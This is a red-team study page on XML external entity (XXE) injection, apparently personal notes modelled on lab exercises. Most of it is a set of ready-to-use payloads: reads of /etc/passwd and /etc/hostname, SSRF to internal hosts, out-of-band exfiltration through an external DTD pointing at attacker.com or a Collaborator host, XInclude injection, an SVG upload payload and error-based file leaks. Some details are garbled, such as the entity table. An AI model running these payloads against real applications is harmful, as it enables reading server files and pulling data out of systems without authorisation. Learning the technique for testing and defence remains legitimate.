RedTeam
3.Web-Hacking
4.Injection
XXE
Xxe

What is XXE

XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any back-end or external systems that the application itself can access.

===If the body content is not in XML format, always attempt to convert it to XML. Some applications may accept this format, potentially allowing you to exploit additional vulnerabilities.===

Entity & DTD

# Entity

When the browser see those, will replace... In XXE case, will replace will malicious XML

&     ---> &
&lt;&gt;  ---> <>
&169;     ---> @
&xxe;     ---> Refer to the declaration of this entity inside XML

## Parameter Entity

%test;   ---> Sometimes, standard entities are not permitted, so this is an alternative approach.
---------------------------------------------------------------------------------
# Define an Entity

## Entity
<!ENTITY xxe SYSTEM "file:///etc/passwd">  ---> Declare entity xxe that perform ...
<mydata>&xxe;</mydata>                     ---> Call entity

## Parameter Entity
<!DOCTYPE test [<!ENTITY % test SYSTEM "http://attacker.com/evil.dtd"> %test; ]>

---------------------------------------------------------------------------------
# DTD (DOCTYPE)

DTD is used to define the structure, allowed elements, attributes, and entities for an XML document. External DTD is used because only external DTL can have parameters that are referenced inside the entity in the same document

With a DTD, you set clear rules for what’s allowed. You might say:

- Every <person> must have:
    - A <name>.
    - An <address>.
- Nothing else is allowed.

In an exploitaiton case, it will be used to include parameters entities inside the the markup declaration itself

## main.xml
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-server.net/exploit"> %xxe;]>
REST_OF_XML

## Evil.dtd
<!ENTITY % file SYSTEM "file:///etc/hostname"> 
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://BURP-COLLABORATOR-SUBDOMAIN/?x=%file;'>"> 
%eval; 
%exfil;

Exploitation

# Exploiting XXE to retrieve files

External entity is defined containing the contents of a file, and returned in the application's response.

<?xml version="1.0" encoding="UTF-8"?> <stockCheck><productId>381</productId></stockCheck>

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <stockCheck><productId>&xxe;</productId></stockCheck>

---------------------------------------------------------------------------------
# Exploiting XXE to perform SSRF attacks

External entity is defined based on a URL to a back-end system.

<?xml version="1.0" encoding="UTF-8"?> <stockCheck><productId>381</productId></stockCheck>

<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://internal.vulnerable-website.com/"> ]> <stockCheck><productId>&xxe;</productId></stockCheck>

You might need to expand the URL from the DTD depending on the response
- Ex: "Invalid product ID: latest" ---> http://vulnerable-website.com/latest/...

---------------------------------------------------------------------------------
# Exploiting blind XXE exfiltrate data out-of-band (BEST OPTION = FTP)

Sensitive data is transmitted from the application server to a system that the attacker controls.

## XInclude attacks

Request HTTP/1.1 blablabla
productId=5&storeId=1    ---> Include XML entity (productId=%26entity;%&storeId=1)
              |-------------> URL encoding the & from the entity

Try to include the following Xinclude

productId=<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>&storeId=1


## XXE attacks via file upload

This can be used when the application accept SVG files.

SVG:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="128px" height="128px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
<text font-size="16" x="0" y="16">&xxe;</text>
</svg>

---------------------------------------------------------------------------------
# Exploiting blind XXE to retrieve data via error messages

Attacker can trigger a parsing error message containing sensitive data.

## Application  ---> Will cause parsing error because of "file:///invalid/"
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY % xxe SYSTEM "https://exploit-0aa000340366a079836bd2cf01050091.exploit-server.net/exploit"> %xxe;]>
REST_OF_XML

## Exploit Server
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'file:///invalid/%file;'>">
%eval;
%exfil;
Self XssIis Xxe